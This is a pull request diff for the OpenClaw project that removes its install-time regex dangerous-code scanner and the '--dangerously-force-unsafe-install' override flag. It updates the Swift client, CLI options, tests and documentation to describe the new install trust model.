### PR TITLE
Remove install-time code scanning [AI]

### DIFF
--- a/apps/macos/Sources/OpenClaw/GatewayConnection.swift
+++ b/apps/macos/Sources/OpenClaw/GatewayConnection.swift
@@ -591,16 +591,12 @@ extension GatewayConnection {
     func skillsInstall(
         name: String,
         installId: String,
-        dangerouslyForceUnsafeInstall: Bool? = nil,
         timeoutMs: Int? = nil) async throws -> SkillInstallResult
     {
         var params: [String: AnyCodable] = [
             "name": AnyCodable(name),
             "installId": AnyCodable(installId),
         ]
-        if let dangerouslyForceUnsafeInstall {
-            params["dangerouslyForceUnsafeInstall"] = AnyCodable(dangerouslyForceUnsafeInstall)
-        }
         if let timeoutMs {
             params["timeoutMs"] = AnyCodable(timeoutMs)
         }

--- a/docs/cli/plugins.md
+++ b/docs/cli/plugins.md
@@ -184,7 +184,7 @@ is available, then fall back to `latest`.
   <Accordion title="Git repositories">
     Use `git:<repo>` to install directly from a git repository. Supported forms include `git:github.com/owner/repo`, `git:owner/repo`, full `https://`, `ssh://`, `git://`, `file://`, and `git@host:owner/repo.git` clone URLs. Add `@<ref>` or `#<ref>` to check out a branch, tag, or commit before install.
 
-    Git installs clone into a temporary directory, check out the requested ref when present, then use the normal plugin directory installer. That means manifest validation, dangerous-code scanning, package-manager install work, and install records behave like npm installs. Recorded git installs include the source URL/ref plus the resolved commit so `openclaw plugins update` can re-resolve the source later.
+    Git installs clone into a temporary directory, check out the requested ref when present, then use the normal plugin directory installer. That means manifest validation, deterministic dependency denylist checks, package-manager install work, and install records behave like npm installs. Recorded git installs include the source URL/ref plus the resolved commit so `openclaw plugins update` can re-resolve the source later.
 
     After installing from git, use `openclaw plugins inspect <id> --runtime --json` to verify runtime registrations such as gateway methods and CLI commands. If the plugin registered a CLI root with `api.registerCli`, execute that command directly through the OpenClaw root CLI, for example `openclaw demo-plugin ping`.
 

--- a/docs/cli/plugins.md
+++ b/docs/cli/plugins.md
@@ -111,7 +111,6 @@ openclaw plugins install git:github.com/<owner>/<repo>  # git repo
 openclaw plugins install git:github.com/<owner>/<repo>@<ref>
 openclaw plugins install <package> --force              # overwrite existing install
 openclaw plugins install <package> --pin                # pin version
-openclaw plugins install <package> --dangerously-force-unsafe-install
 openclaw plugins install <path>                         # local path
 openclaw plugins install <plugin>@<marketplace>         # marketplace
 openclaw plugins install <plugin> --marketplace <name>  # marketplace (explicit)
@@ -125,6 +124,16 @@ sources with guarded environment variables. See
 <Warning>
 Bare package names install from npm by default during the launch cutover, unless they match an official plugin id. Raw `@openclaw/*` package specs that match bundled plugins use the bundled copy that shipped with the current OpenClaw build. Use `npm:<package>` when you deliberately want an external npm package instead. Use `clawhub:<package>` for ClawHub. Treat plugin installs like running code. Prefer pinned versions.
 </Warning>
+
+<Note>
+OpenClaw does not run a local regex dangerous-code scanner during plugin
+install/update. ClawHub is the preferred trusted public registry and exposes
+registry-side security signals. Direct npm, git, archive, marketplace, and local
+path installs are trusted-by-operator paths. Install validation still checks
+manifests, plugin ids, host/API compatibility, archive/path safety, npm
+integrity, package resolution, peer-link repair, and the deterministic blocked
+dependency denylist.
+</Note>
 
 `plugins search` queries ClawHub for installable plugin packages and prints
 install-ready package names. It searches code-plugin and bundle-plugin packages,
@@ -155,16 +164,6 @@ is available, then fall back to `latest`.
   </Accordion>
   <Accordion title="--pin scope">
     `--pin` applies to npm installs only. It is not supported with `git:` installs; use an explicit git ref such as `git:github.com/acme/plugin@v1.2.3` when you want a pinned source. It is not supported with `--marketplace`, because marketplace installs persist marketplace source metadata instead of an npm spec.
-  </Accordion>
-  <Accordion title="--dangerously-force-unsafe-install">
-    `--dangerously-force-unsafe-install` is a break-glass option for false positives in the built-in dangerous-code scanner. It allows the install to continue even when the built-in scanner reports `critical` findings, but it does **not** bypass plugin `before_install` hook policy blocks and does **not** bypass scan failures.
-
-    Install scans ignore common test files and directories such as `tests/`, `__tests__/`, `*.test.*`, and `*.spec.*` to avoid blocking packaged test mocks; declared plugin runtime entrypoints are still scanned even if they use one of those names.
-
-    This CLI flag applies to plugin install/update flows. Gateway-backed skill dependency installs use the matching `dangerouslyForceUnsafeInstall` request override, while `openclaw skills install` remains a separate ClawHub skill download/install flow.
-
-    If a plugin you published on ClawHub is hidden or blocked by a registry scan, use the publisher steps in [ClawHub publishing](/clawhub/publishing). `--dangerously-force-unsafe-install` only affects installs on your own machine; it does not ask ClawHub to rescan the plugin or make a blocked release public.
-
   </Accordion>
   <Accordion title="Hook packs and npm specs">
     `plugins install` is also the install surface for hook packs that expose `openclaw.hooks` in `package.json`. Use `openclaw hooks` for filtered hook visibility and per-hook enablement, not package installation.
@@ -374,7 +373,6 @@ openclaw plugins update <id-or-npm-spec>
 openclaw plugins update --all
 openclaw plugins update <id-or-npm-spec> --dry-run
 openclaw plugins update @openclaw/voice-call
-openclaw plugins update openclaw-codex-app-server --dangerously-force-unsafe-install
 ```
 
 Updates apply to tracked plugin installs in the managed plugin index and tracked hook-pack installs in `hooks.internal.installs`.
@@ -397,9 +395,6 @@ Updates apply to tracked plugin installs in the managed plugin index and tracked
 
     When a stored integrity hash exists and the fetched artifact hash changes, OpenClaw treats that as npm artifact drift. The interactive `openclaw plugins update` command prints the expected and actual hashes and asks for confirmation before proceeding. Non-interactive update helpers fail closed unless the caller supplies an explicit continuation policy.
 
-  </Accordion>
-  <Accordion title="--dangerously-force-unsafe-install on update">
-    `--dangerously-force-unsafe-install` is also available on `plugins update` as a break-glass override for built-in dangerous-code scan false positives during plugin updates. It still does not bypass plugin `before_install` policy blocks or scan-failure blocking, and it only applies to plugin updates, not hook-pack updates.
   </Accordion>
 </AccordionGroup>
 

--- a/docs/concepts/agent-loop.md
+++ b/docs/concepts/agent-loop.md
@@ -97,7 +97,7 @@ These run inside the agent loop or gateway pipeline:
 - **`agent_end`**: inspect the final message list and run metadata after completion.
 - **`before_compaction` / `after_compaction`**: observe or annotate compaction cycles.
 - **`before_tool_call` / `after_tool_call`**: intercept tool params/results.
-- **`before_install`**: inspect built-in scan findings and optionally block skill or plugin installs.
+- **`before_install`**: reserved for future configurable pre-install policy or scanner hooks.
 - **`tool_result_persist`**: synchronously transform tool results before they are written to an OpenClaw-owned session transcript.
 - **`message_received` / `message_sending` / `message_sent`**: inbound + outbound message hooks.
 - **`session_start` / `session_end`**: session lifecycle boundaries.
@@ -107,8 +107,6 @@ Hook decision rules for outbound/tool guards:
 
 - `before_tool_call`: `{ block: true }` is terminal and stops lower-priority handlers.
 - `before_tool_call`: `{ block: false }` is a no-op and does not clear a prior block.
-- `before_install`: `{ block: true }` is terminal and stops lower-priority handlers.
-- `before_install`: `{ block: false }` is a no-op and does not clear a prior block.
 - `message_sending`: `{ cancel: true }` is terminal and stops lower-priority handlers.
 - `message_sending`: `{ cancel: false }` is a no-op and does not clear a prior cancel.
 

--- a/docs/gateway/protocol.md
+++ b/docs/gateway/protocol.md
@@ -612,7 +612,10 @@ terminal summary, and sanitized error text.
     `skills.upload.begin` request. This mode is rejected unless
     `skills.install.allowUploadedArchives` is enabled. The setting does not
     affect ClawHub installs.
-  - Gateway installer mode: `{ name, installId, dangerouslyForceUnsafeInstall?, timeoutMs? }`
+  - Gateway installer mode: `{ name, installId, timeoutMs? }`. Older clients
+    may still send `dangerouslyForceUnsafeInstall`; the Gateway accepts it for
+    compatibility but ignores it because installer code scanning is no longer
+    part of the install path.
     runs a declared `metadata.openclaw.install` action on the gateway host.
 - Operators may call `skills.update` (`operator.admin`) in two modes:
   - ClawHub mode updates one tracked slug or all tracked ClawHub installs in

--- a/docs/gateway/security/index.md
+++ b/docs/gateway/security/index.md
@@ -538,11 +538,12 @@ Plugins run **in-process** with the Gateway. Treat them as trusted code:
 - Restart the Gateway after plugin changes.
 - If you install or update plugins (`openclaw plugins install <package>`, `openclaw plugins update <id>`), treat it like running untrusted code:
   - The install path is the per-plugin directory under the active plugin install root.
-  - OpenClaw runs a built-in dangerous-code scan before install/update. `critical` findings block by default.
+  - OpenClaw does not run a local regex dangerous-code scanner during install/update.
+  - ClawHub is the preferred trusted public registry and exposes registry-side security signals.
+  - Direct npm, git, archive, marketplace, local path, and non-ClawHub skill installs are trusted-by-operator paths.
   - npm and git plugin installs run package-manager dependency convergence only during the explicit install/update flow. Local paths and archives are treated as self-contained plugin packages; OpenClaw copies/references them without running `npm install`.
+  - Install validation still checks manifests, plugin ids, host/API compatibility, archive/path safety, npm integrity, package resolution, peer-link repair, and deterministic blocked dependency names.
   - Prefer pinned, exact versions (`@scope/pkg@1.2.3`), and inspect the unpacked code on disk before enabling.
-  - `--dangerously-force-unsafe-install` is break-glass only for built-in scan false positives on plugin install/update flows. It does not bypass plugin `before_install` hook policy blocks and does not bypass scan failures.
-  - Gateway-backed skill dependency installs follow the same dangerous/suspicious split: built-in `critical` findings block unless the caller explicitly sets `dangerouslyForceUnsafeInstall`, while suspicious findings still warn only. `openclaw skills install` remains the separate ClawHub skill download/install flow.
 
 Details: [Plugins](/tools/plugin)
 

--- a/docs/help/faq.md
+++ b/docs/help/faq.md
@@ -1908,9 +1908,9 @@ lives on the [Models FAQ](/help/faq-models).
 
   <Accordion title="Are ClawHub skills and third-party plugins safe to install?">
     Treat third-party skills and plugins as code you are choosing to trust.
-    ClawHub skill pages expose scan state before install, and OpenClaw plugin
-    install/update flows run built-in dangerous-code checks, but scans are not a
-    complete security boundary.
+    ClawHub exposes registry-side security signals before install. OpenClaw does
+    not run local regex dangerous-code scanning during skill or plugin install;
+    non-ClawHub installs are trusted-by-operator paths.
 
     Safer pattern:
 

--- a/docs/platforms/mac/skills.md
+++ b/docs/platforms/mac/skills.md
@@ -18,7 +18,9 @@ The macOS app surfaces OpenClaw skills via the gateway; it does not parse skills
 
 - `metadata.openclaw.install` defines install options (brew/node/go/uv).
 - The app calls `skills.install` to run installers on the gateway host.
-- Built-in dangerous-code `critical` findings block `skills.install` by default; suspicious findings still warn only. The dangerous override exists on the gateway request, but the default app flow stays fail-closed.
+- Gateway-backed skill installs do not run local regex dangerous-code scanning.
+  Skills outside ClawHub are trusted-by-operator paths; ClawHub pages expose
+  registry-side security signals before install.
 - If every install option is `download`, the gateway surfaces all download
   choices.
 - Otherwise, the gateway picks one preferred installer using the current

--- a/docs/plugins/hooks.md
+++ b/docs/plugins/hooks.md
@@ -152,7 +152,7 @@ observation-only.
 - `gateway_start` / `gateway_stop` - start or stop plugin-owned services with the Gateway
 - `deactivate` - deprecated compatibility alias for `gateway_stop`; use `gateway_stop` in new plugins
 - `cron_changed` - observe gateway-owned cron lifecycle changes (added, updated, removed, started, finished, scheduled)
-- **`before_install`** - inspect skill or plugin install scans and optionally block
+- **`before_install`** - reserved for future configurable pre-install policy or scanner hooks
 
 ## Debug runtime hooks
 
@@ -452,9 +452,9 @@ Decision rules:
 
 ## Install hooks
 
-`before_install` runs after the built-in scan for skill and plugin installs.
-Return additional findings or `{ block: true, blockReason }` to stop the
-install.
+`before_install` remains part of the hook contract, but current OpenClaw
+install paths do not invoke it. Future configurable enterprise/custom
+pre-install policy or scanner hooks are planned.
 
 `block: true` is terminal. `block: false` is treated as no decision.
 

--- a/docs/plugins/sdk-overview.md
+++ b/docs/plugins/sdk-overview.md
@@ -416,8 +416,7 @@ semantics.
 
 - `before_tool_call`: returning `{ block: true }` is terminal. Once any handler sets it, lower-priority handlers are skipped.
 - `before_tool_call`: returning `{ block: false }` is treated as no decision (same as omitting `block`), not as an override.
-- `before_install`: returning `{ block: true }` is terminal. Once any handler sets it, lower-priority handlers are skipped.
-- `before_install`: returning `{ block: false }` is treated as no decision (same as omitting `block`), not as an override.
+- `before_install`: reserved for future configurable pre-install policy or scanner hooks. Current install paths do not invoke it.
 - `reply_dispatch`: returning `{ handled: true, ... }` is terminal. Once any handler claims dispatch, lower-priority handlers and the default model dispatch path are skipped.
 - `message_sending`: returning `{ cancel: true }` is terminal. Once any handler sets it, lower-priority handlers are skipped.
 - `message_sending`: returning `{ cancel: false }` is treated as no decision (same as omitting `cancel`), not as an override.

--- a/docs/tools/skills.md
+++ b/docs/tools/skills.md
@@ -208,12 +208,11 @@ publish and sync.
     symlinked skill folders, but every `SKILL.md` realpath must still stay
     inside its resolved skill directory.
   </Accordion>
-  <Accordion title="Scan and scan overrides">
-    Gateway-backed skill installs (onboarding, Skills settings UI) run the
-    built-in dangerous-code scanner before executing installer metadata.
-    `critical` findings block by default; `suspicious` findings warn only.
-    `openclaw skills install <slug>` downloads a ClawHub skill folder directly
-    and does not use the installer-metadata scanner.
+  <Accordion title="Install trust model">
+    Gateway-backed skill installs (onboarding, Skills settings UI) do not run a
+    local regex dangerous-code scanner before executing installer metadata.
+    ClawHub skill pages expose registry-side security signals before install;
+    non-ClawHub skills are trusted-by-operator paths.
   </Accordion>
   <Accordion title="Secret injection scope">
     `skills.entries.*.env` and `skills.entries.*.apiKey` inject secrets into the

--- a/src/cli/plugins-cli.install.test.ts
+++ b/src/cli/plugins-cli.install.test.ts
@@ -1165,7 +1165,7 @@ describe("plugins cli install", () => {
     expect(npmInstallCall().spec).toBe("demo");
   });
 
-  it("passes npm: prefix installs through npm options without ClawHub lookup", async () => {
+  it("accepts legacy force-unsafe flag for npm installs without forwarding it", async () => {
     const cfg = createEmptyPluginConfig();
     const enabledCfg = createEnabledPluginConfig("demo");
 
@@ -1174,7 +1174,13 @@ describe("plugins cli install", () => {
     enablePluginInConfig.mockReturnValue({ config: enabledCfg });
     recordPluginInstall.mockReturnValue(enabledCfg);
 
-    await runPluginsCommand(["plugins", "install", "npm:demo", "--force"]);
+    await runPluginsCommand([
+      "plugins",
+      "install",
+      "npm:demo",
+      "--force",
+      "--dangerously-force-unsafe-install",
+    ]);
 
     expect(npmInstallCall().spec).toBe("demo");
     expect(npmInstallCall().mode).toBe("update");

--- a/src/cli/plugins-cli.install.test.ts
+++ b/src/cli/plugins-cli.install.test.ts
@@ -305,7 +305,6 @@ type MockWithCalls = {
 type PluginInstallCall = {
   allowSourceTypeScriptEntries?: boolean;
   archivePath?: string;
-  dangerouslyForceUnsafeInstall?: boolean;
   dryRun?: boolean;
   expectedIntegrity?: string;
   expectedPluginId?: string;
@@ -1208,17 +1207,11 @@ describe("plugins cli install", () => {
     enablePluginInConfig.mockReturnValue({ config: enabledCfg });
     recordPluginInstall.mockReturnValue(enabledCfg);
 
-    await runPluginsCommand([
-      "plugins",
-      "install",
-      "npm:demo",
-      "--force",
-      "--dangerously-force-unsafe-install",
-    ]);
+    await runPluginsCommand(["plugins", "install", "npm:demo", "--force"]);
 
     expect(npmInstallCall().spec).toBe("demo");
     expect(npmInstallCall().mode).toBe("update");
-    expect(npmInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
+    expect(npmInstallCall()).not.toHaveProperty("dangerouslyForceUnsafeInstall");
     expect(installPluginFromClawHub).not.toHaveBeenCalled();
   });
 
@@ -1341,98 +1334,6 @@ describe("plugins cli install", () => {
     expect(runtimeErrors.at(-1)).toContain("openclaw plugins install git:<repo>@<ref>");
   });
 
-  it("passes dangerous force unsafe install to marketplace installs", async () => {
-    await expect(
-      runPluginsCommand([
-        "plugins",
-        "install",
-        "alpha",
-        "--marketplace",
-        "local/repo",
-        "--dangerously-force-unsafe-install",
-      ]),
-    ).rejects.toThrow("__exit__:1");
-
-    expect(marketplaceInstallCall().marketplace).toBe("local/repo");
-    expect(marketplaceInstallCall().plugin).toBe("alpha");
-    expect(marketplaceInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
-  });
-
-  it("passes dangerous force unsafe install to npm installs", async () => {
-    primeNpmPluginFallback();
-
-    await runPluginsCommand(["plugins", "install", "demo", "--dangerously-force-unsafe-install"]);
-
-    expect(npmInstallCall().spec).toBe("demo");
-    expect(npmInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
-  });
-
-  it("passes dangerous force unsafe install to linked path probe installs", async () => {
-    const cfg = {
-      plugins: {
-        entries: {},
-      },
-    } as OpenClawConfig;
-    const enabledCfg = createEnabledPluginConfig("demo");
-    const tmpRoot = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-plugin-link-"));
-
-    loadConfig.mockReturnValue(cfg);
-    installPluginFromPath.mockResolvedValueOnce({
-      ok: true,
-      pluginId: "demo",
-      targetDir: tmpRoot,
-      version: "1.2.3",
-      extensions: ["./dist/index.js"],
-    });
-    enablePluginInConfig.mockReturnValue({ config: enabledCfg });
-    recordPluginInstall.mockReturnValue(enabledCfg);
-    applyExclusiveSlotSelection.mockReturnValue({
-      config: enabledCfg,
-      warnings: [],
-    });
-
-    try {
-      await runPluginsCommand([
-        "plugins",
-        "install",
-        tmpRoot,
-        "--link",
-        "--dangerously-force-unsafe-install",
-      ]);
-    } finally {
-      fs.rmSync(tmpRoot, { recursive: true, force: true });
-    }
-
-    expect(pathInstallCall().path).toBe(tmpRoot);
-    expect(pathInstallCall().dryRun).toBe(true);
-    expect(pathInstallCall().allowSourceTypeScriptEntries).toBe(true);
-    expect(pathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
-  });
-
-  it("passes dangerous force unsafe install to linked hook-pack probe fallback", async () => {
-    const tmpRoot = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-hook-link-"));
-    primeHookPackPathFallback({
-      tmpRoot,
-      pluginInstallError: "plugin install probe failed",
-    });
-
-    try {
-      await runPluginsCommand([
-        "plugins",
-        "install",
-        tmpRoot,
-        "--link",
-        "--dangerously-force-unsafe-install",
-      ]);
-    } finally {
-      fs.rmSync(tmpRoot, { recursive: true, force: true });
-    }
-
-    expect(hookPathInstallCall().path).toBe(tmpRoot);
-    expect(hookPathInstallCall().dryRun).toBe(true);
-    expect(hookPathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
-  });
-
   it("does not fall back to hook pack for linked path when a no-flag security scan blocks", async () => {
     const localPluginDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-link-plugin-"));
     const pluginInstallError = "plugin blocked by security scan";
@@ -1455,29 +1356,6 @@ describe("plugins cli install", () => {
     expect(installHooksFromPath).not.toHaveBeenCalled();
     expect(runtimeErrors.at(-1)).toContain(pluginInstallError);
     expect(runtimeErrors.at(-1)).not.toContain("Also not a valid hook pack");
-  });
-
-  it("passes dangerous force unsafe install to local hook-pack fallback installs", async () => {
-    const tmpRoot = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-hook-install-"));
-    primeHookPackPathFallback({
-      tmpRoot,
-      pluginInstallError: "plugin install failed",
-    });
-
-    try {
-      await runPluginsCommand([
-        "plugins",
-        "install",
-        tmpRoot,
-        "--dangerously-force-unsafe-install",
-      ]);
-    } finally {
-      fs.rmSync(tmpRoot, { recursive: true, force: true });
-    }
-
-    expect(hookPathInstallCall().path).toBe(tmpRoot);
-    expect(hookPathInstallCall().mode).toBe("install");
-    expect(hookPathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
   });
 
   it("passes the active profile extensions dir to local path installs", async () => {
@@ -1586,12 +1464,9 @@ describe("plugins cli install", () => {
           logger?: { warn?: (message: string) => void };
           path: string;
           dryRun?: boolean;
-          dangerouslyForceUnsafeInstall?: boolean;
         },
       ];
-      params.logger?.warn?.(
-        'WARNING: Plugin "demo" forced despite dangerous code patterns via --dangerously-force-unsafe-install: index.js:1',
-      );
+      params.logger?.warn?.('WARNING: Plugin "demo" install warning: index.js:1');
       return {
         ok: true,
         pluginId: "demo",
@@ -1608,13 +1483,7 @@ describe("plugins cli install", () => {
     });
 
     try {
-      await runPluginsCommand([
-        "plugins",
-        "install",
-        localPluginDir,
-        "--link",
-        "--dangerously-force-unsafe-install",
-      ]);
+      await runPluginsCommand(["plugins", "install", localPluginDir, "--link"]);
     } finally {
       fs.rmSync(localPluginDir, { recursive: true, force: true });
     }
@@ -1622,14 +1491,9 @@ describe("plugins cli install", () => {
     expect(pathInstallCall().path).toBe(localPluginDir);
     expect(pathInstallCall().dryRun).toBe(true);
     expect(pathInstallCall().allowSourceTypeScriptEntries).toBe(true);
-    expect(pathInstallCall().dangerouslyForceUnsafeInstall).toBe(true);
     expect(typeof pathInstallCall().logger?.info).toBe("function");
     expect(typeof pathInstallCall().logger?.warn).toBe("function");
-    expect(
-      runtimeLogsContain(
-        "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-      ),
-    ).toBe(true);
+    expect(runtimeLogsContain('Plugin "demo" install warning')).toBe(true);
   });
 
   it("does not fall back to hook pack for local path when a no-flag security scan fails", async () => {
@@ -1656,88 +1520,6 @@ describe("plugins cli install", () => {
     expect(runtimeErrors.at(-1)).not.toContain("Also not a valid hook pack");
   });
 
-  it("does not fall back to hook pack for local path when dangerous force unsafe install is set", async () => {
-    const localPluginDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-local-plugin-"));
-    const cfg = {} as OpenClawConfig;
-    const pluginInstallError = "plugin blocked by security scan";
-
-    loadConfig.mockReturnValue(cfg);
-    installPluginFromPath.mockResolvedValue({
-      ok: false,
-      error: pluginInstallError,
-      code: "security_scan_blocked",
-    });
-
-    try {
-      await expect(
-        runPluginsCommand([
-          "plugins",
-          "install",
-          localPluginDir,
-          "--dangerously-force-unsafe-install",
-        ]),
-      ).rejects.toThrow("__exit__:1");
-    } finally {
-      fs.rmSync(localPluginDir, { recursive: true, force: true });
-    }
-
-    expect(installHooksFromPath).not.toHaveBeenCalled();
-    expect(runtimeErrors.at(-1)).toContain(pluginInstallError);
-  });
-
-  it("does not fall back to hook pack for local path when security scan fails under dangerous force unsafe install", async () => {
-    const localPluginDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-local-plugin-"));
-    const cfg = {} as OpenClawConfig;
-    const pluginInstallError = "plugin security scan failed";
-
-    loadConfig.mockReturnValue(cfg);
-    installPluginFromPath.mockResolvedValue({
-      ok: false,
-      error: pluginInstallError,
-      code: "security_scan_failed",
-    });
-
-    try {
-      await expect(
-        runPluginsCommand([
-          "plugins",
-          "install",
-          localPluginDir,
-          "--dangerously-force-unsafe-install",
-        ]),
-      ).rejects.toThrow("__exit__:1");
-    } finally {
-      fs.rmSync(localPluginDir, { recursive: true, force: true });
-    }
-
-    expect(installHooksFromPath).not.toHaveBeenCalled();
-    expect(runtimeErrors.at(-1)).toContain(pluginInstallError);
-  });
-
-  it("does not fall back to hook pack for npm installs when dangerous force unsafe install is set", async () => {
-    const cfg = {} as OpenClawConfig;
-    const pluginInstallError = "plugin blocked by security scan";
-
-    loadConfig.mockReturnValue(cfg);
-    installPluginFromClawHub.mockResolvedValue({
-      ok: false,
-      error: "ClawHub /api/v1/packages/demo failed (404): Package not found",
-      code: "package_not_found",
-    });
-    installPluginFromNpmSpec.mockResolvedValue({
-      ok: false,
-      error: pluginInstallError,
-      code: "security_scan_blocked",
-    });
-
-    await expect(
-      runPluginsCommand(["plugins", "install", "demo", "--dangerously-force-unsafe-install"]),
-    ).rejects.toThrow("__exit__:1");
-
-    expect(installHooksFromNpmSpec).not.toHaveBeenCalled();
-    expect(runtimeErrors.at(-1)).toContain(pluginInstallError);
-  });
-
   it("does not fall back to hook pack for npm installs when a no-flag security scan blocks", async () => {
     primeBlockedNpmPluginInstall({
       spec: "@acme/unsafe-plugin",
@@ -1753,31 +1535,7 @@ describe("plugins cli install", () => {
     expect(runtimeErrors.at(-1)).not.toContain("Also not a valid hook pack");
   });
 
-  it("does not fall back to hook pack for npm installs when security scan fails under dangerous force unsafe install", async () => {
-    const cfg = {} as OpenClawConfig;
-    const pluginInstallError = "plugin security scan failed";
-
-    loadConfig.mockReturnValue(cfg);
-    installPluginFromClawHub.mockResolvedValue({
-      ok: false,
-      error: "ClawHub /api/v1/packages/demo failed (404): Package not found",
-      code: "package_not_found",
-    });
-    installPluginFromNpmSpec.mockResolvedValue({
-      ok: false,
-      error: pluginInstallError,
-      code: "security_scan_failed",
-    });
-
-    await expect(
-      runPluginsCommand(["plugins", "install", "demo", "--dangerously-force-unsafe-install"]),
-    ).rejects.toThrow("__exit__:1");
-
-    expect(installHooksFromNpmSpec).not.toHaveBeenCalled();
-    expect(runtimeErrors.at(-1)).toContain(pluginInstallError);
-  });
-
-  it("still falls back to local hook pack when dangerous force unsafe install is set for non-security errors", async () => {
+  it("still falls back to local hook pack for non-security errors", async () => {
     const localHookDir = fs.mkdtempSync(path.join(os.tmpdir(), "openclaw-local-hook-pack-"));
     const cfg = {} as OpenClawConfig;
     const installedCfg = {
@@ -1809,12 +1567,7 @@ describe("plugins cli install", () => {
     recordHookInstall.mockReturnValue(installedCfg);
 
     try {
-      await runPluginsCommand([
-        "plugins",
-        "install",
-        localHookDir,
-        "--dangerously-force-unsafe-install",
-      ]);
+      await runPluginsCommand(["plugins", "install", localHookDir]);
     } finally {
       fs.rmSync(localHookDir, { recursive: true, force: true });
     }
@@ -1823,7 +1576,7 @@ describe("plugins cli install", () => {
     expect(runtimeLogsContain("Installed hook pack: demo-hooks")).toBe(true);
   });
 
-  it("still falls back to npm hook pack when dangerous force unsafe install is set for non-security errors", async () => {
+  it("still falls back to npm hook pack for non-security errors", async () => {
     const cfg = {} as OpenClawConfig;
     const installedCfg = {
       hooks: {
@@ -1864,12 +1617,7 @@ describe("plugins cli install", () => {
     });
     recordHookInstall.mockReturnValue(installedCfg);
 
-    await runPluginsCommand([
-      "plugins",
-      "install",
-      "@acme/demo-hooks",
-      "--dangerously-force-unsafe-install",
-    ]);
+    await runPluginsCommand(["plugins", "install", "@acme/demo-hooks"]);
 
     expect(hookNpmInstallCall().spec).toBe("@acme/demo-hooks");
     expect(runtimeLogsContain("Installed hook pack: demo-hooks")).toBe(true);

--- a/src/cli/plugins-cli.install.test.ts
+++ b/src/cli/plugins-cli.install.test.ts
@@ -194,22 +194,6 @@ function primeNpmPluginFallback(pluginId = "demo") {
   return { cfg, enabledCfg };
 }
 
-function createPathHookPackInstalledConfig(tmpRoot: string): OpenClawConfig {
-  return {
-    hooks: {
-      internal: {
-        installs: {
-          "demo-hooks": {
-            source: "path",
-            sourcePath: tmpRoot,
-            installPath: tmpRoot,
-          },
-        },
-      },
-    },
-  } as OpenClawConfig;
-}
-
 function createNpmHookPackInstalledConfig(): OpenClawConfig {
   return {
     hooks: {
@@ -277,23 +261,6 @@ function primeBlockedNpmPluginInstall(params: {
     error: `Plugin "${params.pluginId}" installation blocked: dangerous code patterns detected: finding details`,
     code: params.code ?? "security_scan_blocked",
   });
-}
-
-function primeHookPackPathFallback(params: {
-  tmpRoot: string;
-  pluginInstallError: string;
-}): OpenClawConfig {
-  const installedCfg = createPathHookPackInstalledConfig(params.tmpRoot);
-
-  loadConfig.mockReturnValue({} as OpenClawConfig);
-  installPluginFromPath.mockResolvedValueOnce({
-    ok: false,
-    error: params.pluginInstallError,
-  });
-  installHooksFromPath.mockResolvedValueOnce(createHookPackInstallResult(params.tmpRoot));
-  recordHookInstall.mockReturnValue(installedCfg);
-
-  return installedCfg;
 }
 
 type MockWithCalls = {

--- a/src/cli/plugins-cli.runtime.ts
+++ b/src/cli/plugins-cli.runtime.ts
@@ -18,7 +18,6 @@ import { formatMissingPluginMessage } from "./error-format.js";
 import type { PluginMarketplaceListOptions, PluginRegistryOptions } from "./plugins-cli.js";
 
 type PluginInstallActionOptions = {
-  dangerouslyForceUnsafeInstall?: boolean;
   force?: boolean;
   link?: boolean;
   pin?: boolean;

--- a/src/cli/plugins-cli.ts
+++ b/src/cli/plugins-cli.ts
@@ -1,4 +1,4 @@
-import type { Command } from "commander";
+import { Option, type Command } from "commander";
 import { formatDocsLink } from "../../packages/terminal-core/src/links.js";
 import { theme } from "../../packages/terminal-core/src/theme.js";
 import type { PluginInspectOptions } from "./plugins-inspect-command.js";
@@ -32,6 +32,10 @@ export type PluginRegistryOptions = {
   json?: boolean;
   refresh?: boolean;
 };
+
+function createLegacyForceUnsafeInstallOption(): Option {
+  return new Option("--dangerously-force-unsafe-install").hideHelp().default(false);
+}
 
 export type PluginAuthoringBuildOptions = {
   root?: string;
@@ -148,6 +152,7 @@ export function registerPluginsCli(program: Command) {
     .option("-l, --link", "Link a local path instead of copying", false)
     .option("--force", "Overwrite an existing installed plugin or hook pack", false)
     .option("--pin", "Record npm installs as exact resolved <name>@<version>", false)
+    .addOption(createLegacyForceUnsafeInstallOption())
     .option(
       "--marketplace <source>",
       "Install a Claude marketplace plugin from a local repo/path or git/GitHub source",
@@ -173,6 +178,7 @@ export function registerPluginsCli(program: Command) {
     .argument("[id]", "Plugin or hook-pack id (omit with --all)")
     .option("--all", "Update all tracked plugins and hook packs", false)
     .option("--dry-run", "Show what would change without writing", false)
+    .addOption(createLegacyForceUnsafeInstallOption())
     .action(async (id: string | undefined, opts: PluginUpdateOptions) => {
       const { runPluginUpdateCommand } = await import("./plugins-update-command.js");
       await runPluginUpdateCommand({ id, opts });

--- a/src/cli/plugins-cli.ts
+++ b/src/cli/plugins-cli.ts
@@ -9,7 +9,6 @@ import { applyParentDefaultHelpAction } from "./program/parent-default-help.js";
 export type PluginUpdateOptions = {
   all?: boolean;
   dryRun?: boolean;
-  dangerouslyForceUnsafeInstall?: boolean;
 };
 
 export type PluginMarketplaceListOptions = {
@@ -150,11 +149,6 @@ export function registerPluginsCli(program: Command) {
     .option("--force", "Overwrite an existing installed plugin or hook pack", false)
     .option("--pin", "Record npm installs as exact resolved <name>@<version>", false)
     .option(
-      "--dangerously-force-unsafe-install",
-      "Bypass built-in dangerous-code install blocking (plugin hooks may still block)",
-      false,
-    )
-    .option(
       "--marketplace <source>",
       "Install a Claude marketplace plugin from a local repo/path or git/GitHub source",
     )
@@ -162,7 +156,6 @@ export function registerPluginsCli(program: Command) {
       async (
         raw: string,
         opts: {
-          dangerouslyForceUnsafeInstall?: boolean;
           force?: boolean;
           link?: boolean;
           pin?: boolean;
@@ -180,11 +173,6 @@ export function registerPluginsCli(program: Command) {
